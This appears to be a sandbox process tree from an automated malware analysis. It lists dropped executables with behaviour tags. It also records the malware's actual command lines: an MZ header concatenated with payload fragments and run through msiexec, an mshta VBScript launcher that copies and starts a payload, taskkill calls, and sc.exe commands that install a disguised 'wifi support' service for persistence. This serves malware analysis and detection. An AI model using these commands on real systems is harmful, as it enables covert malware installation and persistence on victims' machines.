                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C EchO | Set /p = "MZ" >76G0.lSN & CoPY /y /b 76G0.LSN + PdlGFK.Jm + uYpSK.eVi + Dn3ORHj.P_h + 5QkEjQH.M + eREnh.zX J7WZl2.Bu6 & stART msiexec.exe /Y .\J7wZl2.BU6
                                                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7256
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EchO "
                                                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4068
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>76G0.lSN"
                                                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:3532
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                                                msiexec.exe /Y .\J7wZl2.BU6
                                                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                PID:6056
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                          taskkill /f -IM "Sc9uMnQuoYkOvsBpzpxDWjiN.exe"
                                                                                                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                          PID:3844
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\gsV5XqIlv9XAo7iKOEPXgtiL.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\gsV5XqIlv9XAo7iKOEPXgtiL.exe"
                                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:6536
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-3L7N1.tmp\gsV5XqIlv9XAo7iKOEPXgtiL.tmp
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-3L7N1.tmp\gsV5XqIlv9XAo7iKOEPXgtiL.tmp" /SL5="$2033E,5006342,1534464,C:\Users\Admin\Pictures\Adobe Films\gsV5XqIlv9XAo7iKOEPXgtiL.exe"
                                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:7048
                                                                                                                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Exlade Disk Password Protection 5\diskpp.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Exlade Disk Password Protection 5\diskpp.exe"
                                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:6720
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\ThMf3BfXjGDuxXgXAhXoh9NA.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\ThMf3BfXjGDuxXgXAhXoh9NA.exe"
                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                          PID:6580
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\HceFJIBbphQInanvjAXhNHC8.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\HceFJIBbphQInanvjAXhNHC8.exe"
                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                          PID:6568
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\jooO3QPQhJKaOtMaB48LCxGh.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\jooO3QPQhJKaOtMaB48LCxGh.exe"
                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                          PID:6692
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\4KEkFPzfAoHDTxK1tWrog4RF.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\4KEkFPzfAoHDTxK1tWrog4RF.exe"
                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                          PID:6768
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\KGiJVm9ia0Hy8yhZUDyB3FAJ.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\KGiJVm9ia0Hy8yhZUDyB3FAJ.exe"
                                                                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:6908
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\ZrIglurybL1z1vvFgfcMTBRN.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\ZrIglurybL1z1vvFgfcMTBRN.exe"
                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                            PID:7076
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\IT5Z76gVDIxwt9ilgBl4J9Sk.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\IT5Z76gVDIxwt9ilgBl4J9Sk.exe"
                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:7140
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\GQzOfWeY535S6Kk6vOQRKh9s.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\GQzOfWeY535S6Kk6vOQRKh9s.exe"
                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                              PID:6876
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\hZfPGfC9XolcivTqhjtSoMAu.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\hZfPGfC9XolcivTqhjtSoMAu.exe"
                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:6540
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-U3N4C.tmp\hZfPGfC9XolcivTqhjtSoMAu.tmp
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-U3N4C.tmp\hZfPGfC9XolcivTqhjtSoMAu.tmp" /SL5="$104D4,1584849,831488,C:\Users\Admin\Pictures\Adobe Films\hZfPGfC9XolcivTqhjtSoMAu.exe"
                                                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:7296
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri207a27f7f543e5fe.exe
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1060
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Fri208f6a10911.exe
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:932
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri207a27f7f543e5fe.exe
                                                                                                                                                                                                                                                                                                                                                                            Fri207a27f7f543e5fe.exe
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                            PID:3240
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri207a27f7f543e5fe.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri207a27f7f543e5fe.exe
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                              PID:4248
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri208f6a10911.exe
                                                                                                                                                                                                                                                                                                                                                                            Fri208f6a10911.exe
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                            PID:1960
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-AQ8MK.tmp\Fri208f6a10911.tmp
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-AQ8MK.tmp\Fri208f6a10911.tmp" /SL5="$4013C,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri208f6a10911.exe"
                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                              PID:2180
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-8N6UN.tmp\PowerOff.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-8N6UN.tmp\PowerOff.exe" /S /UID=91
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                PID:4180
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\44-e9450-e9b-e80be-4888c2306738c\Miqefasaerae.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\44-e9450-e9b-e80be-4888c2306738c\Miqefasaerae.exe"
                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:764
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                                                                                                                      dw20.exe -x -s 2072
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:4436
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1b-ac7c1-886-3aa81-ce1951ab79a3d\Bunaficyxa.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1b-ac7c1-886-3aa81-ce1951ab79a3d\Bunaficyxa.exe"
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:8684
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-QSCQL.tmp\Fri20405c77f8562ea6.tmp
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-QSCQL.tmp\Fri20405c77f8562ea6.tmp" /SL5="$300F4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20405c77f8562ea6.exe"
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                  PID:3208
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20405c77f8562ea6.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20405c77f8562ea6.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    PID:3236
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-ICT1B.tmp\Fri20405c77f8562ea6.tmp
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-ICT1B.tmp\Fri20405c77f8562ea6.tmp" /SL5="$400F4,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20405c77f8562ea6.exe" /SILENT
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:860
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-AS2FL.tmp\winhostdll.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-AS2FL.tmp\winhostdll.exe" ss1
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                          PID:5040
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2050c5d6de57ca396.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2050c5d6de57ca396.exe" -u
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    PID:2084
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-38IS5.tmp\Fri2000bef28b4.tmp
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-38IS5.tmp\Fri2000bef28b4.tmp" /SL5="$40116,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2000bef28b4.exe"
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                    PID:972
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1060
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Company\NewProduct\rtst1039.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Company\NewProduct\rtst1039.exe"
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2020
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\PBrowserSetp311019.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\PBrowserSetp311019.exe"
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1048
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\4038702.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\4038702.exe"
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                            PID:7692
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3783918.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3783918.exe"
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                                                                                                                                            PID:7404
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\7852216.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\7852216.exe"
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:5432
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2225325.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2225325.exe"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                              PID:4236
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\2509793.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\2509793.exe"
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:7336
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\3710140.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\3710140.exe"
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:6600
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBsCrIpT: close ( CreatEobJecT ( "Wscript.sHElL"). RUn ( "cmd.eXe /q /C Type ""C:\Users\Admin\AppData\Roaming\3710140.exe"" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF """"== """" for %f In ( ""C:\Users\Admin\AppData\Roaming\3710140.exe"" ) do taskkill /f -Im ""%~Nxf"" " , 0 ,TRUe ) )
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2104
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /q /C Type "C:\Users\Admin\AppData\Roaming\3710140.exe" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF ""== "" for %f In ( "C:\Users\Admin\AppData\Roaming\3710140.exe" ) do taskkill /f -Im "%~Nxf"
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6652
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                              taskkill /f -Im "3710140.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                              PID:7268
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3436435.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3436435.exe"
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:5692
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\1225608.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\1225608.exe"
                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6392
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\3793979.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\3793979.exe"
                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                                                          PID:8172
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\inst2.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\inst2.exe"
                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:6140
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                          PID:9180
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8204
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20211126-2051.dm
                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8732
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                            PID:10152
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                                                              PID:7136
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4AD.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4AD.exe
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6504
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4AD.exe
                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\4AD.exe
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                                              PID:9412
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EDF.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\EDF.exe
                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                                                                                                                                                            PID:8756
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hocgsksw\
                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:9712
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\higqtmrc.exe" C:\Windows\SysWOW64\hocgsksw\
                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7968
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" create hocgsksw binPath= "C:\Windows\SysWOW64\hocgsksw\higqtmrc.exe /d\"C:\Users\Admin\AppData\Local\Temp\EDF.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7744
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\sc.exe" description hocgsksw "wifi internet conection"
                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10020
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7928
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" start hocgsksw
                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2740
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\hjdsokgx.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\hjdsokgx.exe" /d"C:\Users\Admin\AppData\Local\Temp\EDF.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8620
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hudabgsf.exe" C:\Windows\SysWOW64\hocgsksw\
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5232
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:7396
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" config hocgsksw binPath= "C:\Windows\SysWOW64\hocgsksw\hudabgsf.exe /d\"C:\Users\Admin\hjdsokgx.exe\""
                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:9548
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
